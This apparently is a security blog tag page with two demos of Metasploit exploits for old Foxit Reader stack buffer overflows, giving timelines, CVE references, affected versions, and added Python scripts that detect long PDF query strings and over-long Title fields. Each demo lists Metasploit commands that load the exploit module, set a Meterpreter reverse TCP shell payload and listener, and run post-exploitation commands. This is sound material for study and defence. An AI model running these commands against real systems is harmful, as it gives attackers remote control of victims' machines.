Tag Archives: Foxit

Foxit Reader Plugin URL Processing Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by rgod on 2013-01-07
Vendor public release of the vulnerability on 2013-01-14
Metasploit PoC provided on 2013-02-12

PoC provided by :

rgod
Sven Krewitt
juan vazquez

Reference(s) :

CVE-2012-3569
OSVDB-89030
BID-57174
Foxit Bulletin

Affected version(s) :

Foxit Reader 5.4.4 and earlier
Foxit PhantomPDF 5.4.2 and earlier

Tested on Windows 7 Integral SP1 with :

Firefox 18.0.2
Foxit Reader version 5.4.4.11281

Description :

This module exploits a vulnerability in the Foxit Reader Plugin, located in the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts, an overly long query string in the URL causes a stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit has been tested on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530).
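The trigger described above is an unusually long query string on a URL that points at a PDF. As an added example (not part of the original post or of the Metasploit module), the following script flags such requests in web-proxy logs. The log format (`timestamp client method url status`) and the 512-byte query threshold are assumptions for illustration; the sample log lines are constructed.

```python
"""Flag proxy-log requests for PDFs whose URL query string is unusually long.

Assumptions (not taken from the advisory): a space-separated log format
'<timestamp> <client> <method> <url> <status>', and a 512-byte query-string
threshold chosen for illustration; tune it to your environment.
"""
from urllib.parse import urlsplit

QUERY_THRESHOLD = 512  # assumed threshold, not a value from the advisory


def is_pdf_path(path: str) -> bool:
    """True if the URL path names a PDF (case-insensitive extension check)."""
    return path.lower().endswith(".pdf")


def check_log_line(line: str, threshold: int = QUERY_THRESHOLD):
    """Return (client, url, query_len) when the line is a PDF request whose
    query string exceeds the threshold, else None. Malformed lines are skipped."""
    parts = line.split()
    if len(parts) < 5:
        return None
    _timestamp, client, _method, url, _status = parts[:5]
    try:
        u = urlsplit(url)
    except ValueError:
        return None
    if not is_pdf_path(u.path):
        return None
    qlen = len(u.query)
    if qlen > threshold:
        return (client, url, qlen)
    return None


def scan(lines, threshold: int = QUERY_THRESHOLD):
    """Run check_log_line over an iterable of log lines and collect the hits."""
    return [hit for hit in (check_log_line(line, threshold) for line in lines) if hit]


# Constructed sample log lines: one benign PDF request, one PDF request with a
# 1500-byte query, one long query on a non-PDF resource, and one malformed line.
SAMPLE_LINES = [
    "2013-02-12T10:00:01 10.0.0.5 GET http://docs.example/report.pdf?id=42 200",
    "2013-02-12T10:00:07 10.0.0.5 GET http://files.example/brochure.pdf?q=" + "A" * 1500 + " 200",
    "2013-02-12T10:00:09 10.0.0.6 GET http://files.example/index.html?x=" + "B" * 1500 + " 200",
    "garbage line",
]

if __name__ == "__main__":
    for client, url, qlen in scan(SAMPLE_LINES):
        print(f"{client} requested a PDF with a {qlen}-byte query string: {url[:60]}...")
```

Only the second sample line is reported: the long query on `index.html` is ignored because the plugin only handles PDF URLs, and the malformed line is skipped rather than raising.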

Commands :

use exploit/windows/browser/foxit_reader_plugin_url_bof
set SRVHOST 192.168.178.26
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

EDB-ID-15532 : Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow

Timeline :

Vulnerability reported to the vendor by offsec before the public release on Exploit-DB
Vendor released a new version on 2010-09-29
dookie & Sud0 exploit released on Exploit-DB on 2010-11-13
Metasploit exploit released on 2010-11-22

PoC provided by :

dookie
Sud0
corelanc0d3r
jduck

Reference(s) :

EDB-ID-15532

Affected version(s) :

Foxit PDF Reader prior to version 4.2.0.0928

Tested on Windows 7 Integral with :

Foxit PDF Reader 4.1.1.0805

Description :

This module exploits a stack buffer overflow in Foxit PDF Reader prior to version 4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that contains an overly long string in the Title field. This results in overwriting a structured exception handler record. NOTE: This exploit does not use javascript.
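Since the trigger here is an overly long string in the PDF's Title field, a defender can screen incoming documents for exactly that before they reach a vulnerable reader. The script below is an added example, not code from the original post or from the Metasploit module: it extracts `/Title` entries (literal and hex string forms) from raw PDF bytes and reports any longer than a threshold. The 256-byte threshold is an assumption for illustration, and the minimal PDF skeleton used as sample input is constructed here.

```python
"""Screen PDF bytes for an over-long /Title string.

Assumptions (not from the advisory): a 256-byte threshold chosen for
illustration, and a constructed minimal PDF skeleton as sample input.
"""
import re

TITLE_THRESHOLD = 256  # assumed threshold, not a value from the advisory
TITLE_RE = re.compile(rb"/Title\s*")


def _read_literal(data: bytes, start: int) -> bytes:
    """Read a PDF literal string whose '(' is at data[start], honouring
    backslash escapes and balanced nested parentheses."""
    depth = 0
    i = start
    out = bytearray()
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":  # escape: keep the next byte verbatim
            if i + 1 < len(data):
                out += data[i + 1:i + 2]
            i += 2
            continue
        if c == b"(":
            depth += 1
            if depth > 1:
                out += c
        elif c == b")":
            depth -= 1
            if depth == 0:
                return bytes(out)
            out += c
        else:
            out += c
        i += 1
    return bytes(out)  # unterminated string: return what was read


def extract_titles(pdf: bytes):
    """Return the decoded value of every /Title entry found in the file."""
    titles = []
    for m in TITLE_RE.finditer(pdf):
        pos = m.end()
        if pdf[pos:pos + 1] == b"(":
            titles.append(_read_literal(pdf, pos))
        elif pdf[pos:pos + 1] == b"<":  # hex string form <48656c6c6f>
            end = pdf.find(b">", pos)
            if end != -1:
                hexstr = re.sub(rb"\s", b"", pdf[pos + 1:end])
                try:
                    titles.append(bytes.fromhex(hexstr.decode("ascii")))
                except ValueError:
                    titles.append(pdf[pos + 1:end])
    return titles


def suspicious_titles(pdf: bytes, threshold: int = TITLE_THRESHOLD):
    """Titles longer than the threshold, i.e. candidates for manual review."""
    return [t for t in extract_titles(pdf) if len(t) > threshold]


def build_sample_pdf(title: bytes) -> bytes:
    """Constructed minimal PDF skeleton with an Info dictionary carrying the
    given /Title (no valid xref table; enough for the scanner)."""
    return (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
            b"2 0 obj\n<< /Title (" + title + b") /Producer (sample) >>\nendobj\n"
            b"trailer\n<< /Info 2 0 R /Root 1 0 R >>\n%%EOF\n")


if __name__ == "__main__":
    for name, doc in (("benign", build_sample_pdf(b"Quarterly Report")),
                      ("oversized", build_sample_pdf(b"A" * 4000))):
        hits = suspicious_titles(doc)
        print(f"{name}: {len(hits)} suspicious title(s)",
              *(f"(length {len(t)})" for t in hits))
```

The parser deliberately works on raw bytes rather than a full PDF object model, so it also sees titles in incremental updates or objects that a strict parser would reject; a hit is a review signal, not proof of exploitation.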

Commands :

use exploit/windows/fileformat/foxit_title_bof
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sysinfo
getuid